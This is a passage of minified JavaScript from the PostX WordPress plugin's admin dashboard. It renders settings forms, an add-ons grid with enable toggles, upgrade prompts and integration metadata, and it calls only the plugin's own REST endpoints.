ultp-settings-input-field"},(0,a.createElement)("input",{type:"number",name:e,defaultValue:r}),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"switch":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{value:"yes",type:"checkbox",name:e,defaultChecked:"yes"==r||"on"==r}),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"switchButton":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{type:"checkbox",value:"yes",name:e,defaultChecked:"yes"==r||"on"==r}),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc),(0,a.createElement)("div",null,(0,a.createElement)("span",{id:"postx-regenerate-css",className:`ultp-upgrade-pro-btn cursor ${"yes"==r?"active":""} `},(0,a.createElement)("span",{className:"dashicons dashicons-admin-generic"}),(0,a.createElement)("span",{className:"ultp-text"},__("Re-Generate Font Files","ultimate-post")))));case"multiselect":const n=Array.isArray(r)?r:[r];return(0,a.createElement)(s,{multikey:e,value:t,multiValue:n});case"text":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,defaultValue:r}),(0,a.createElement)("span",{className:"ultp-description"},t.desc,t.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:t.link,rel:"noreferrer"},t.linkText)));case"textarea":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("textarea",{name:e,defaultValue:r}),(0,a.createElement)("span",{className:"ultp-description"},t.desc,t.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:t.link,rel:"noreferrer"},t.linkText)));case"shortcode":return(0,a.createElement)("code",{className:"ultp-shortcode-copy"},"[",t.value,"]")}})(n,o,t)))))}))),c=(e,t,n="")=>{const r=n||__("Upgrade to Pro","ultimate-post");return(0,a.createElement)("a",{href:(0,o.Z)(e,t,""),className:"ultp-upgrade-pro-btn",target:"_blank",rel:"noreferrer"},r,"  ➤")},d=({tags:e,func:t,data:n})=>(0,a.createElement)("div",{className:"ultp-addon-lock-container-overlay"},(0,a.createElement)("div",{className:"ultp-addon-lock-container"},(0,a.createElement)("div",{className:"ultp-popup-unlock"},(0,a.createElement)("img",{src:`${ultp_option_panel.url}/assets/img/dashboard/${n.icon}`,alt:"lock icon"}),(0,a.createElement)("div",{className:"title ultp_h5"},n?.title),(0,a.createElement)("div",{className:"ultp-description"},n?.description),c("",e),(0,a.createElement)("button",{onClick:()=>{t(!1)},className:"ultp-popup-close"},r.ZP.close_line)))),u=(e,t,n,r="")=>(0,a.createElement)("a",{href:(0,o.Z)(e,t,""),className:"ultp-primary-button "+r,target:"_blank",rel:"noreferrer"},n),m=(e,t,n,r="")=>(0,a.createElement)("a",{href:(0,o.Z)(e,t,""),className:"ultp-secondary-button "+r,target:"_blank",rel:"noreferrer"},n),f=({proBtnTags:e,FRBtnTag:t})=>{const[n,i]=(0,a.useState)([{id:"go-pro-unlock-more",title:"Go Pro & Unlock More! 🚀",description:"Unlock the full potential of PostX to create and manage professional News Magazines and Blogging sites with complete creative freedom.",features:[__("Access to 40+ Blocks","ultimate-post"),__("Access to 250+ Patterns","ultimate-post"),__("All Starter Packs Access","ultimate-post"),__("Advanced Query Builder","ultimate-post"),__("Ajax Filter and Pagination","ultimate-post"),__("Custom Fonts with Typography","ultimate-post")],visible:!ultp_option_panel.active,buttons:[{type:"primary-alter",icon:r.ZP.rocket,url:"https://www.wpxpo.com/postx/?utm_source=db-postx-setting&utm_medium=upgrade-pro-sidebar&utm_campaign=postx-dashboard#pricing",label:"Upgrade Pro"},{type:"transparent-alter",label:"Free VS Pro"}]},{id:"feature-request",title:"Feature Request",description:"Can't find your desired feature? Let us know your requirements. We will definitely take them into our consideration.",buttons:[{type:"primary",url:"https://www.wpxpo.com/postx/roadmap/?utm_source=postx-menu&utm_medium=DB-roadmap&utm_campaign=postx-dashboard",label:"Request a Feature"}],visible:!0},{id:"web-community",title:"PostX Community",description:"Join the Facebook community of PostX to stay up-to-date and share your thoughts and feedback.",buttons:[{type:"primary",icon:r.ZP.facebook,url:"https://www.facebook.com/groups/gutenbergpostx",label:"Join PostX Community"}],visible:!0},{id:"news-tips",title:"News, Tips & Update",linkIcon:r.ZP.rightArrowLg,links:[{text:"Getting Started with PostX",url:"https://wpxpo.com/docs/postx/getting-started/?utm_source=postx-menu&utm_medium=DB-news-postx_GT&utm_campaign=postx-dashboard"},{text:"How to use the Dynamic Site Builder",url:"https://wpxpo.com/docs/postx/dynamic-site-builder/?utm_source=postx-menu&utm_medium=DB-news-DSB_guide&utm_campaign=postx-dashboard"},{text:"How to use the PostX Features",url:"https://wpxpo.com/docs/postx/postx-features/?utm_source=postx-menu&utm_medium=DB-news-feature_guide&utm_campaign=postx-dashboard"},{text:"PostX Blog",url:"https://www.wpxpo.com/category/postx/?utm_source=postx-menu&utm_medium=DB-news-blog&utm_campaign=postx-dashboard"}],visible:!0},{id:"rating",title:"Show your love",description:"Enjoying PostX? Give us a 5 Star review to support our ongoing work.",buttons:[{type:"primary",url:"https://wordpress.org/support/plugin/ultimate-post/reviews/",label:"Rate it Now"}],visible:!0}]);return(0,a.createElement)("div",{className:"ultp-sidebar-features"},!ultp_option_panel.active&&new Date>=new Date("2024-03-07")&&new Date<=new Date("2024-03-13")&&(0,a.createElement)("div",{className:"ultp-dashboard-pro-features ultp-dash-item-con"},(0,a.createElement)("a",{href:"https://www.wpxpo.com/postx/?utm_source=postx-ad&utm_medium=sidebar-banner&utm_campaign=postx-dashboard#pricing",target:"_blank",style:{textDecoration:"none !important",display:"block"},rel:"noreferrer"},(0,a.createElement)("img",{src:ultp_option_panel.url+"assets/img/dashboard/db_sidebar.jpg",style:{width:"100%",height:"100%",borderRadius:"8px"},alt:"40k+ Banner"}))),n.map(((e,t)=>!1!==e.visible&&(0,a.createElement)("div",{key:t,className:`ultp-sidebar-card-item ultp-sidebar-${e.id}`},"banner"===e.type?(0,a.createElement)("a",{href:e.bannerUrl,target:"_blank",rel:"noreferrer",style:{textDecoration:"none !important",display:"block"}},(0,a.createElement)("img",{src:e.imageUrl,style:{width:"100%",height:"100%",borderRadius:"8px"},alt:e.alt})):(0,a.createElement)(a.Fragment,null,e.title&&(0,a.createElement)("div",{className:"ultp-sidebar-card-title"},__(e.title,"ultimate-post")),e.description&&(0,a.createElement)("span",{className:"ultp-sidebar-card-description"},__(e.description,"ultimate-post")),e.features?(0,a.createElement)("div",{className:"ultp-pro-feature-lists"},e.features.map(((e,t)=>(0,a.createElement)("span",{key:t},r.ZP.right_circle_line," ",__(e,"ultimate-post"))))):e.links?(0,a.createElement)("div",{className:"ultp-sidebar-card-links"},e.links.map(((t,n)=>(0,a.createElement)("a",{className:"ultp-sidebar-card-link",key:n,target:"_blank",href:t.url,rel:"noreferrer"},e.linkIcon&&(0,a.createElement)("span",null,e.linkIcon),__(t.text,"ultimate-post"))))):null,e.buttons&&e.buttons.length>0&&(0,a.createElement)("div",{className:"ultp-sidebar-card-buttons"},e.buttons.map((e=>(({type:e="primary",icon:t,url:n,tags:r,label:i,classname:l=""})=>(0,a.createElement)("a",{href:(0,o.Z)(n,r,""),className:"ultp-"+e+"-button "+l,target:"_blank",rel:"noreferrer",key:i+Math.random()},t&&t,i))({type:e.type,icon:e.icon,url:e.url,tags:e.tags||"",label:e.label,classname:e.classname||""})))))))))}},860:(e,t,n)=>{"use strict";n.d(t,{Z:()=>m});var a=n(7294),r=n(1383),o=n(7763),i=n(4766),l=n(4482),s=n(1389),p=n(8949),c=n(356),d=(n(6129),n(1370)),u=n(6731);const{__}=wp.i18n,m=({integrations:e,generalDiscount:t={}})=>{const[n,m]=(0,a.useState)(""),[f,h]=(0,a.useState)(!1),[g,v]=(0,a.useState)({}),[_,w]=(0,a.useState)(""),[b,x]=(0,a.useState)({state:!1,status:""}),[y,k]=(0,a.useState)(""),[E,C]=(0,a.useState)(!1);let S=d.q;const M=ultp_dashboard_pannel.addons_settings,L=Object.entries(S);L.sort(((e,t)=>e[1].position-t[1].position)),S=Object.fromEntries(L),(0,a.useEffect)((()=>(P(),document.addEventListener("mousedown",A),()=>document.removeEventListener("mousedown",A))),[]);const N=[{label:__("45+ Blocks","ultimate-post"),descp:__("PostX comes with over 45 Gutenberg blocks","ultimate-post")},{label:__("250+ Patterns","ultimate-post"),descp:__("Get full access to all ready post sections","ultimate-post")},{label:__("50+ Starter Sites","ultimate-post"),descp:__("Pre-built websites are ready to import in one click","ultimate-post")},{label:__("Global Styles","ultimate-post"),descp:__("Control the full website’s colors and typography globally","ultimate-post")},{label:__("Dark/Light Mode","ultimate-post"),descp:__("Let your readers switch between light and dark modes","ultimate-post")},{label:__("Advanced Query Builder","ultimate-post"),descp:__("Display/reorder posts, pages, and custom post types","ultimate-post")},{label:__("Dynamic Site Builder","ultimate-post"),descp:__("Dynamically create templates for essential pages","ultimate-post")},{label:__("Ajax Powered Filter","ultimate-post"),descp:__("Let your visitors filter posts by categories and tags","ultimate-post")},{label:__("Advanced Post Slider","ultimate-post"),descp:__("Display posts in engaging sliders and carousels","ultimate-post")},{label:__("SEO Meta Support","ultimate-post"),descp:__("Replace the post excerpts with meta descriptions","ultimate-post")},{label:__("Custom Fonts","ultimate-post"),descp:__("Upload custom fonts per your requirements","ultimate-post")},{label:__("Ajax Powered Pagination","ultimate-post"),descp:__("PostX comes with three types of Ajax pagination","ultimate-post")}],Z=(0,r.t)(),P=()=>{wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&Z.current&&v(e.settings)}))},z=e=>{C(!0),e.preventDefault();const t=new FormData(e.target),n={};for(const a of e.target.elements)a.name&&("checkbox"!==a.type||a.checked?"radio"===a.type?a.checked&&(n[a.name]=a.value):"select-multiple"===a.type?n[a.name]=t.getAll(a.name):"custom_multiselect"==a.dataset.customprop?n[a.name]=a.value?a.value.split(","):[]:n[a.name]=a.value:n[a.name]="");wp.apiFetch({path:"/ultp/v2/save_plugin_settings",method:"POST",data:{settings:n,action:"action",type:"type"}}).then((e=>{C(!1),e.success&&x({status:"success",messages:[e.message],state:!0})}))},A=e=>{e.target.closest(".ultp-addon-settings-popup")||m("")},B=[__("Access to Pro Starter Site Templates","ultimate-post"),__("Access to All Pro Features","ultimate-post"),__("Fully Unlocked Site Builder","ultimate-post"),__("And more…","ultimate-post")],H=[{label:__("Add-Ons","ultimate-post"),value:"addons",integration:!1},{label:__("Integration Add-Ons","ultimate-post"),value:"integration-addons",integration:!0}];return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-dashboard-addons-container "+(Object.keys(g).length>0?"":" skeletonOverflow")},!e&&(0,a.createElement)("div",{className:"ultp-gettingstart-message"},(0,a.createElement)("div",{className:"ultp-start-left"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_banner.jpg",alt:"Banner"}),(0,a.createElement)("div",{className:"ultp-start-content"},(0,a.createElement)("span",{className:"ultp-start-text"},__("Enjoy Pro-level Ready Templates!","ultimate-post")),(0,a.createElement)("div",{className:"ultp-start-btns"},(0,l.ac)("https://www.wpxpo.com/postx/starter-sites/?utm_source=db-postx-started&utm_medium=starter-sites&utm_campaign=postx-dashboard&pux_link=dbstartersite","",__("Explore Starter Sites","ultimate-post"),""),(0,l.WO)("https://www.wpxpo.com/postx/?utm_source=db-postx-started&utm_medium=details&utm_campaign=postx-dashboard","",__("Plugin Details","ultimate-post"),"")))),(0,a.createElement)("div",{className:"ultp-start-right"},(0,a.createElement)("div",{className:"ultp-dashborad-banner",style:{cursor:"pointer"},onClick:()=>k((0,a.createElement)("iframe",{width:"1100",height:"500",src:"https://www.youtube.com/embed/FYgSe7kgb6M?autoplay=1",title:__("How to add Product Filter to WooCommerce Shop Page","ultimate-post"),allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share",allowFullScreen:!0}))},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_right_banner.jpg",className:"ultp-banner-img"}),(0,a.createElement)("div",{className:"ultp-play-icon-container"},(0,a.createElement)("img",{className:"ultp-play-icon",src:ultp_dashboard_pannel.url+"/assets/img/dashboard/play.png",alt:__("Play","ultimate-post")}),(0,a.createElement)("span",{className:"ultp-animate"}))),(0,a.createElement)("div",{className:"ultp-dashboard-content"},ultp_dashboard_pannel.active?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-title _pro"},__("What Do You Need?","ultimate-post")),(0,a.createElement)("div",{className:"ultp-description _pro"},__("Do you have something in mind you want to share? Both we and our users would like to hear about it. Share your ideas on our Facebook group and let us know what you need.","ultimate-post")),(0,l.ac)("https://www.facebook.com/groups/gutenbergpostx","","Share Ideas","")):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-title"},__("Do More with","ultimate-post")," ",(0,a.createElement)("span",{style:{color:"var(--postx-primary-color)"}},__("PRO:","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-description"},__("Unlock powerful customizations with PostX Pro:","ultimate-post")),(0,a.createElement)("div",{className:"ultp-lists"},B.map(((e,t)=>(0,a.createElement)("span",{className:"ultp-list",key:t},o.Z.rightMark," ",e)))),(0,a.createElement)("a",{href:"https://www.wpxpo.com/postx/?utm_source=db-postx-started&utm_medium=upgrade-pro-hero&utm_campaign=postx-dashboard#pricing",className:"ultp-upgrade-btn",target:"_blank",rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),o.Z.rocketPro))))),f&&(0,l.cs)({tags:"addons_popup",func:e=>{h(e)},data:{icon:"addon_lock.svg",title:__("Unlock All Addons of PostX","ultimate-post"),description:__("Sorry, this addon is not available in the free version of PostX. Please upgrade to a pro plan to unlock all pro addons and features of PostX.","ultimate-post")}}),(0,a.createElement)("div",{className:"ultp-addons-container-grid"},(0,a.createElement)("div",{className:"ultp-addons-items"},H.map((t=>(0,a.createElement)("div",{key:t.value,className:"ultp-addon-group"},(0,a.createElement)("div",{className:"ultp_h2 ultp-addon-parent-heading"},t.label),Object.keys(g).length>0?((e=!1)=>(0,a.createElement)("div",{className:"ultp-addons-grid "+(e?"":"ultp-gs")},Object.keys(S).map(((t,r)=>{const o=S[t];if(e&&!o.integration||!e&&o.integration)return;let s=!0;return s=!("true"!=g[t]&&1!=g[t]||o.is_pro&&!ultp_dashboard_pannel.active),(0,a.createElement)("div",{className:"ultp-addon-item",key:t},(0,a.createElement)("div",{className:"ultp-addon-item-contents",style:{paddingBottom:o.notice?"10px":"auto"}},(0,a.createElement)("div",{className:"ultp-addon-item-name"},(0,a.createElement)("img",{src:`${ultp_dashboard_pannel.url}assets/img/addons/${o.img}`,alt:o.name}),(0,a.createElement)("div",{className:"ultp_h6 ultp-addon-item-title"},o.name,o?.new&&(0,a.createElement)("span",{className:"ultp-new-tag"},"New")),(0,a.createElement)("div",{className:"ultp-dash-control-options ultp-ml-auto"},(0,a.createElement)("input",{type:"checkbox",datatype:t,className:"ultp-addons-enable "+(o.is_pro&&!ultp_dashboard_pannel.active?"disabled":""),id:t,checked:s,onChange:()=>{(e=>{const t="true"==g[e]?"false":"true";!ultp_dashboard_pannel.active&&S[e].is_pro?(v({...g,[e]:"false"}),h(!0)):(v({...g,[e]:t}),wp.apiFetch({path:"/ultp/v2/addon_block_action",method:"POST",data:{key:e,value:t}}).then((n=>{n.success&&(["ultp_templates","ultp_custom_font","ultp_builder"].includes(e)&&(document.getElementById("postx-submenu-"+e.replace("templates","saved_templates").replace("ultp_","").replace("_","-")).style.display="true"==t?"block":"none",document.getElementById(e.replace("templates","saved_templates").replace("ultp_","ultp-dasnav-").replace("_","-")).style.display="true"==t?"":"none"),setTimeout((function(){x({status:"success",messages:[n.message],state:!0})}),400))})))})(t)}}),(0,a.createElement)("label",{htmlFor:t,className:"ultp-control__label"},o.is_pro&&!ultp_dashboard_pannel.active&&(0,a.createElement)("span",{className:"dashicons dashicons-lock"})))),(0,a.createElement)("div",{className:"ultp-description"},o.desc,o.notice&&(0,a.createElement)("div",{className:"ultp-description-notice"},o.notice)),o.required&&o.required?.name&&(0,a.createElement)("span",{className:"ultp-plugin-required"}," ",__("This addon required this plugin:","ultimate-post"),o.required.name),o.is_pro&&!ultp_dashboard_pannel.active&&(0,a.createElement)("div",{onClick:()=>{h(!0)},className:"ultp-pro-lock"},(0,a.createElement)("span",null,"PRO"))),(0,a.createElement)("div",{className:"ultp-addon-item-actions ultp-dash-control-options"},(0,a.createElement)("div",{className:"ultp-docs-action"},o.live&&(0,a.createElement)("a",{href:o.live.replace("live_demo_args",`?utm_source=${e?"db-postx-integration":"db-postx-addons"}&utm_medium=${e?"":t+"-"}demo&utm_campaign=postx-dashboard`),className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},i.ZP.desktop,__("Demo","ultimate-post")),o.docs&&(0,a.createElement)("a",{href:o.docs+(e?"?utm_source=db-postx-integration":"?utm_source=db-postx-addons")+"&utm_medium=docs&utm_campaign=postx-dashboard",className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},i.ZP.media_document,__("Docs","ultimate-post")),o.video&&(0,a.createElement)("a",{href:o.video,className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},i.ZP.rightAngle,__("Video","ultimate-post")),M[t]&&(0,a.createElement)("div",{className:"ultp-popup-setting",onClick:()=>{m(t)}},i.ZP.setting),n==t&&(0,a.createElement)("div",{className:"ultp-addon-settings"},(0,a.createElement)("div",{className:"ultp-addon-settings-popup"},M[t]&&(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-addon-settings-title"},(0,a.createElement)("div",{className:"ultp_h6"},o.name,": ",__("Settings","ultimate-post"))),(0,a.createElement)("form",{onSubmit:z,action:""},(0,a.createElement)("div",{className:"ultp-addon-settings-body"},"ultp_frontend_submission"===t&&(0,a.createElement)(u.Z,{attr:M[t].attr,settings:g,setSettings:v}),"ultp_frontend_submission"!=t&&(0,l.DC)(M[t].attr,g),(0,a.createElement)("div",{className:"ultp-data-message"})),(0,a.createElement)("div",{className:"ultp-addon-settings-footer"},(0,a.createElement)("button",{type:"submit",className:"cursor ultp-primary-button "+(E?"onloading":"")},__("Save Settings","ultimate-post"),E&&i.ZP.refresh))),(0,a.createElement)("button",{onClick:()=>{m("")},className:"ultp-popup-close"})))))))}))))(!!t.integration):(0,a.createElement)("div",{className:"ultp-addons-grid "+(e?"":"ultp-gs")},Array(6).fill(1).map(((e,t)=>(0,a.createElement)("div",{key:t,className:"ultp-addon-item"},(0,a.createElement)("div",{className:"ultp-addon-item-contents"},(0,a.createElement)("div",{className:"ultp-addon-item-name"},(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:50,unit2:"px",br:18}}),(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:190,unit1:"px",size2:28,unit2:"px",br:4}})),(0,a.createElement)("div",{className:"ultp-description"},(0,a.createElement)(p.Z,{type:"custom_size",classes:"loop",c_s:{size1:100,unit1:"%",size2:14,unit2:"px",br:2}}),(0,a.createElement)(p.Z,{type:"custom_size",classes:"loop",c_s:{size1:70,unit1:"%",size2:14,unit2:"px",br:2}}))),(0,a.createElement)("div",{className:"ultp-addon-item-actions ultp-dash-control-options"},(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:8}}),(0,a.createElement)("div",{className:"ultp-docs-action"},(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:50,unit1:"px",size2:22,unit2:"px",br:2}}),(0,a.createElement)(p.Z,{type:"custom_size",c_s:{size1:60,unit1:"px",size2:22,unit2:"px",br:2}}))))))),!e&&(0,a.createElement)("div",{className:"ultp_dash_key_features"},(0,a.createElement)("div",{className:"ultp_h2"},__("Key Features of PostX","ultimate-post")),(0,a.createElement)("div",{className:"ultp_dash_key_features_content"},N?.map(((e,t)=>(0,a.createElement)("div",{key:t},(0,a.createElement)("div",{className:"ultp_dash_key_features_label"},e.label),(0,a.createElement)("div",{className:"ultp-description"},e.descp)))))))))),e&&(0,a.createElement)(l.gR,{FRBtnTag:"settingsFR",proBtnTags:"postx_dashboard_settings"}))),b.state&&(0,a.createElement)(c.Z,{delay:2e3,toastMessages:b,setToastMessages:x}),y&&(0,a.createElement)(s.Z,{title:__("Postx Intro","ultimate-post"),modalContent:y,setModalContent:k}))}},6731:(e,t,n)=>{"use strict";n.d(t,{Z:()=>i});var a=n(7294),r=n(4190),o=n(4766);const{__}=wp.i18n,i=({attr:e,settings:t,setSettings:n})=>{const i=e,l=({multikey:e,value:r,multiValue:i})=>{var l;const[s,p]=(0,a.useState)([...i]),[c,d]=(0,a.useState)(!1),[u,m]=(0,a.useState)(null!==(l=r.options)&&void 0!==l?l:{}),[f,h]=(0,a.useState)(""),g=e=>{e.target.closest(".ultp-ms-container")||d(!1)};return(0,a.useEffect)((()=>(document.addEventListener("mousedown",g),()=>document.removeEventListener("mousedown",g))),[]),(0,a.useEffect)((()=>{setTimeout((()=>{const e=Object.fromEntries(Object.entries(r.options).filter((([e,t])=>t.toLowerCase().includes(f.toLowerCase())||e.toLowerCase().includes(f.toLowerCase()))));m(e)}),500)}),[f]),(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"hidden",name:e,value:s,"data-customprop":"custom_multiselect"}),(0,a.createElement)("div",{className:"ultp-ms-container"},(0,a.createElement)("div",{onClick:()=>d(!c),className:"ultp-ms-results-con cursor"},(0,a.createElement)("div",{className:"ultp-ms-results"},s.length>0?s?.map(((i,l)=>(0,a.createElement)("span",{key:l,className:"ultp-ms-selected"},r.options[i],(0,a.createElement)("span",{className:"ultp-ms-remove cursor",onClick:a=>{a.stopPropagation(),(a=>{const r=s.filter((e=>e!=a));p(r),n({...t,[e]:r})})(i)}},o.ZP.close_circle_line)))):(0,a.createElement)("span",null,__("Select options"))),(0,a.createElement)("span",{onClick:()=>d(!c),className:"ultp-ms-results-collapse cursor"},o.ZP.collapse_bottom_line)),c&&u&&(0,a.createElement)("div",{className:"ultp-ms-options"},(0,a.createElement)("input",{type:"text",className:"ultp-multiselect-search",value:f,onChange:e=>h(e.target.value)}),Object.keys(u)?.map(((o,i)=>(0,a.createElement)("span",{className:"ultp-ms-option cursor",onClick:()=>(a=>{let o=[];if(-1==s.indexOf(a)&&"all"!=a&&(o=[...s,a]),"all"===a){const e=Object.fromEntries(Object.entries(r.options).filter((([e,t])=>!t.toLowerCase().includes("all"))));o=Object.keys(e)}p(o),n({...t,[e]:o})})(o),key:i,value:o},u[o]))))))};return(0,a.createElement)(a.Fragment,null,Object.keys(i).map(((e,o)=>{const s=i[e];return(0,a.createElement)("span",{key:o},"hidden"==s.type&&(0,a.createElement)("input",{key:e,type:"hidden",name:e,defaultValue:s.value}),"hidden"!=s.type&&(0,a.createElement)(a.Fragment,null,"heading"==s.type&&(0,a.createElement)("h2",{className:"ultp-settings-heading"},s.label)&&(0,a.createElement)(a.Fragment,null,s.desc&&(0,a.createElement)("div",{className:"ultp-settings-subheading"},s.desc)),"heading"!=s.type&&((e,n)=>{let a=!0;return n.hasOwnProperty("depends_on")&&n.depends_on.forEach((e=>{"=="==e.condition&&t[e.key]!=e.value&&(a=!1)})),a})(0,s)&&(0,a.createElement)("div",{className:"ultp-settings-wrap"},s.label&&(0,a.createElement)("strong",null,s.label,s.tooltip&&(0,a.createElement)(r.Z,{placement:"bottom",content:s.tooltip},(0,a.createElement)("span",{className:" cursor dashicons dashicons-editor-help"}))),(0,a.createElement)("div",{className:"ultp-settings-field-wrap"},((e,r,o)=>{const i=t.hasOwnProperty(e)?t[e]:t.default?t.default:"multiselect"==r.type?[]:"",s=e=>{n((t=>"checkbox"===e.target.type?{...t,[e.target.name]:e.target.checked?"yes":"no"}:{...t,[e.target.name]:e.target.value}))};switch(r.type){case"select":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("select",{defaultValue:i,name:e,id:e,onChange:s},Object.keys(r.options).map(((e,t)=>(0,a.createElement)("option",{key:t,value:e},r.options[e])))),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"radio":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("div",{className:"ultp-field-radio"},(0,a.createElement)("div",{className:"ultp-field-radio-items"},Object.keys(r.options).map(((t,n)=>(0,a.createElement)("div",{key:n,className:"ultp-field-radio-item"},(0,a.createElement)("input",{type:"radio",id:t,name:e,value:t,defaultChecked:t==i,onChange:s}),(0,a.createElement)("label",{htmlFor:t},r.options[t])))))),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"color":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"text",defaultValue:i,className:"ultp-color-picker"}),(0,a.createElement)("span",{className:"ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,className:"ultp-color-code",defaultValue:i})),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"number":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"number",name:e,defaultValue:i,onChange:s}),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"switch":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{value:"yes",type:"checkbox",name:e,defaultChecked:"yes"==i||"on"==i,onChange:s}),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc));case"switchButton":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{type:"checkbox",value:"yes",name:e,defaultChecked:"yes"==i||"on"==i}),r.desc&&(0,a.createElement)("span",{className:"ultp-description"},r.desc),(0,a.createElement)("div",null,(0,a.createElement)("span",{id:"postx-regenerate-css",className:`ultp-upgrade-pro-btn cursor ${"yes"==i?"active":""} `},(0,a.createElement)("span",{className:"dashicons dashicons-admin-generic"}),(0,a.createElement)("span",{className:"ultp-text"},__("Re-Generate Font Files","ultimate-post")))));case"multiselect":const t=Array.isArray(i)?i:[i];return(0,a.createElement)(l,{multikey:e,value:r,multiValue:t});case"text":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,defaultValue:i,onChange:s}),(0,a.createElement)("span",{className:"ultp-description"},r.desc,r.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:r.link,rel:"noreferrer"},r.linkText)));case"textarea":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("textarea",{name:e,defaultValue:i}),(0,a.createElement)("span",{className:"ultp-description"},r.desc,r.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:r.link,rel:"noreferrer"},r.linkText)));case"shortcode":return(0,a.createElement)("code",{className:"ultp-shortcode-copy"},"[",r.value,"]")}})(e,s)))))})))}},1370:(e,t,n)=>{"use strict";n.d(t,{q:()=>a});const{__}=wp.i18n,a={ultp_wpbakery:{name:"WPBakery",desc:__("It lets you use PostX’s Gutenberg blocks in the WPBakery Builder by using the Saved Template Addon.","ultimate-post"),img:"wpbakery.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/wpbakery-page-builder-addon/",live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",video:"https://www.youtube.com/watch?v=f99NZ6N9uDQ",position:20,integration:!0},ultp_templates:{name:"Saved Templates",desc:__("Create unlimited templates by converting Gutenberg blocks into shortcodes to use them anywhere.","ultimate-post"),img:"saved-template.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/shortcodes-support/",live:"https://www.wpxpo.com/postx/addons/save-template/live_demo_args",video:"https://www.youtube.com/watch?v=6ydwiIp2Jkg",position:10},ultp_table_of_content:{name:"Table of Contents",desc:__("It enables a highly customizable block to the Gutenberg blocks library to display the Table of Contents.","ultimate-post"),img:"table-of-content.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/table-of-content/",live:"https://www.wpxpo.com/postx/addons/table-of-content/live_demo_args",video:"https://www.youtube.com/watch?v=xKu_E720MkE",position:25},ultp_oxygen:{name:"Oxygen",desc:__("It lets you use PostX’s Gutenberg blocks in the Oxygen Builder by using the Saved Template Addon.","ultimate-post"),img:"oxygen.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/add-on/oxygen-builder-addon/",live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",video:"https://www.youtube.com/watch?v=iGik4w3ZEuE",position:20,integration:!0},ultp_elementor:{name:"Elementor",desc:__("It lets you use PostX’s Gutenberg blocks in the Elementor Builder by using the Saved Template Addon.","ultimate-post"),img:"elementor-icon.svg",is_pro:!1,live:"https://www.wpxpo.com/postx/page-builder-integration/live_demo_args",docs:"https://wpxpo.com/docs/postx/add-on/elementor-addon/",video:"https://www.youtube.com/watch?v=GJEa2_Tow58",position:20,integration:!0},ultp_dynamic_content:{name:"Dynamic Content",desc:__("Insert dynamic, real-time content like excerpts, dates, author names, etc. in PostX blocks.","ultimate-post"),img:"dynamic-content.svg",is_pro:!1,docs:"https://wpxpo.com/docs/postx/postx-features/dynamic-content/",live:"https://www.wpxpo.com/create-custom-fields-in-wordpress/live_demo_args",video:"https://www.youtube.com/watch?v=4oeXkHCRVCA",position:6,notice:"ACF, Meta Box and Pods (PRO)",new:!0},ultp_divi:{name:"Divi",desc:__("It lets you use PostX’s Gutenberg blocks in the Divi Builder by using the Saved 